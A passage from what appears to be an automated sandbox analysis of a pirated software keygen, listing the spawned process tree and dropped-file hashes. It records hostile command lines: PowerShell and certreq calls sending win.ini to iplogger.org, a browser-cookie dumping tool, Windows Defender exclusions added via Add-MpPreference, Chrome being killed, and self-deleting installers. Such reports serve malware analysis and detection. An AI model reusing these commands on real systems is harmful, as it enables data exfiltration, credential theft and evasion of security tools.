    cmd.exe /c taskkill /f /im chrome.exe
[10] C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    - Kills process with taskkill
[8] C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe
    "C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe" /Verysilent /subid=577
[9] C:\Users\Admin\AppData\Local\Temp\is-3G6TK.tmp\Setup3310.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-3G6TK.tmp\Setup3310.tmp" /SL5="$50288,802346,56832,C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe" /Verysilent /subid=577
[10] C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe" /Verysilent
[11] C:\Users\Admin\AppData\Local\Temp\is-FI9IS.tmp\Setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-FI9IS.tmp\Setup.tmp" /SL5="$2035C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe" /Verysilent
[12] C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe
    "C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe" /Verysilent
[13] C:\Users\Admin\AppData\Local\Temp\is-GTR7N.tmp\PictureLAb.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-GTR7N.tmp\PictureLAb.tmp" /SL5="$30666,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe" /Verysilent
[8] C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe
    "C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe" /VERYSILENT
[9] C:\Users\Admin\AppData\Local\Temp\is-V934J.tmp\chashepro3.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-V934J.tmp\chashepro3.tmp" /SL5="$1034E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe" /VERYSILENT
[10] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c "start https://iplogger.org/1aSny7"
[10] C:\Program Files (x86)\JCleaner\mex.exe
    "C:\Program Files (x86)\JCleaner\mex.exe"
[11] C:\Program Files (x86)\JCleaner\mex.exe
    "{path}"
[10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
[10] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c "start https://iplogger.org/1EaGq7"
[10] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
[11] C:\Windows\SysWOW64\certreq.exe
    certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
[10] C:\Program Files (x86)\JCleaner\Venita.exe
    "C:\Program Files (x86)\JCleaner\Venita.exe"
[10] C:\Program Files (x86)\JCleaner\Brava.exe
    "C:\Program Files (x86)\JCleaner\Brava.exe"
[10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
[8] C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe
    "C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe" /VERYSILENT /id=535
[9] C:\Users\Admin\AppData\Local\Temp\is-PN164.tmp\vict.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-PN164.tmp\vict.tmp" /SL5="$1035C,870426,780800,C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe" /VERYSILENT /id=535
[10] C:\Users\Admin\AppData\Local\Temp\is-K48FO.tmp\wimapi.exe
    "C:\Users\Admin\AppData\Local\Temp\is-K48FO.tmp\wimapi.exe" 535
[8] C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe
    "C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe" /ustwo INSTALL
[9] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "xqmvz3dfafk.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe" & exit
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "xqmvz3dfafk.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe"C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MIET6.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-MIET6.tmp\vpn.tmp" /SL5="$1036C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe" /silent /subid=4829⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
-
C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H2IVM.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-H2IVM.tmp\IBInstaller_97039.tmp" /SL5="$20360,14441882,721408,C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T4E9D.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-T4E9D.tmp\{app}\chrome_proxy.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\tixos3qqujd\aigutgplo3u.exe"C:\Users\Admin\AppData\Local\Temp\tixos3qqujd\aigutgplo3u.exe" 57a764d042bf88⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\4K28S1JOWW\4K28S1JOW.exe" 57a764d042bf8 & exit9⤵
-
C:\Program Files\4K28S1JOWW\4K28S1JOW.exe"C:\Program Files\4K28S1JOWW\4K28S1JOW.exe" 57a764d042bf810⤵
-
C:\Users\Admin\AppData\Local\Temp\sdj1ns23w4m\app.exe"C:\Users\Admin\AppData\Local\Temp\sdj1ns23w4m\app.exe" /8-238⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Black-Dew"9⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe"C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe"C:\Users\Admin\AppData\Roaming\F0FE.tmp.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\F2B5.tmp.exe"C:\Users\Admin\AppData\Roaming\F2B5.tmp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\F2B5.tmp.exe"{path}"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
-
C:\ProgramData\2024789.22"C:\ProgramData\2024789.22"5⤵
-
C:\ProgramData\7822039.86"C:\ProgramData\7822039.86"5⤵
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
-
C:\ProgramData\111938.1"C:\ProgramData\111938.1"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C997A94FA401D7C38BF8A58D09D8EE1F C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C018DA33AB2D26B8A2B98A612AFE119C C2⤵
-
C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-1.exekeygen-step-1.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exekeygen-step-3.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-4.exekeygen-step-4.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"4⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
-
C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe" 1 3.1615300265.604786a98eaad 1016⤵
-
C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A83NKB8ZU3\multitimer.exe" 2 3.1615300265.604786a98eaad7⤵
-
C:\Users\Admin\AppData\Local\Temp\gbvmpzwryxq\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\gbvmpzwryxq\chashepro3.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8IOQ7.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-8IOQ7.tmp\chashepro3.tmp" /SL5="$304D6,1478410,58368,C:\Users\Admin\AppData\Local\Temp\gbvmpzwryxq\chashepro3.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\lae0odxomsp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\lae0odxomsp\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DA984.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-DA984.tmp\vpn.tmp" /SL5="$70060,15170975,270336,C:\Users\Admin\AppData\Local\Temp\lae0odxomsp\vpn.exe" /silent /subid=4829⤵
-
C:\Users\Admin\AppData\Local\Temp\lnkdq3mgwp5\app.exe"C:\Users\Admin\AppData\Local\Temp\lnkdq3mgwp5\app.exe" /8-238⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Young-Mountain"9⤵
-
C:\Users\Admin\AppData\Local\Temp\1f4hfedmu2p\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\1f4hfedmu2p\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\nqjrbbczsiu\1etg40wf0yq.exe"C:\Users\Admin\AppData\Local\Temp\nqjrbbczsiu\1etg40wf0yq.exe" /ustwo INSTALL8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "1etg40wf0yq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nqjrbbczsiu\1etg40wf0yq.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "1etg40wf0yq.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\0oku0oeabkc\vict.exe"C:\Users\Admin\AppData\Local\Temp\0oku0oeabkc\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\kwj5ey5v44p\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\kwj5ey5v44p\askinstall24.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe"C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe"C:\Users\Admin\AppData\Roaming\3BB3.tmp.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3E54.tmp.exe"C:\Users\Admin\AppData\Roaming\3E54.tmp.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-I5K4A.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-I5K4A.tmp\vict.tmp" /SL5="$40334,870426,780800,C:\Users\Admin\AppData\Local\Temp\0oku0oeabkc\vict.exe" /VERYSILENT /id=5351⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LTR8M.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-LTR8M.tmp\wimapi.exe" 5352⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UL9NQ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UL9NQ.tmp\Setup3310.tmp" /SL5="$4034C,802346,56832,C:\Users\Admin\AppData\Local\Temp\1f4hfedmu2p\Setup3310.exe" /Verysilent /subid=5771⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M3HE2.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M3HE2.tmp\Setup.exe" /Verysilent2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HJ6FE.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HJ6FE.tmp\Setup.tmp" /SL5="$305F4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-M3HE2.tmp\Setup.exe" /Verysilent3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe1⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe2⤵
- Kills process with taskkill
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
Downloads
SHA51220de17d511cc1b3f283a28423f5bdfaef36f104d62c33a1da6449c528d1d8e4986afe8ef68e590add9262c3c7441132022a049022d14deba08a8c72e139f78f4
-
\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.dllMD5
3f0c03e5076c7e6b404f894ff4dc5bb1
SHA19cf99c875e6acd4b12e0eddd5fa51d296ea4998e
SHA2564e7ebed8410c83b73a23185aa94680143da2933305cd6deefe8ec0b51b7ee6f3
SHA51220de17d511cc1b3f283a28423f5bdfaef36f104d62c33a1da6449c528d1d8e4986afe8ef68e590add9262c3c7441132022a049022d14deba08a8c72e139f78f4
-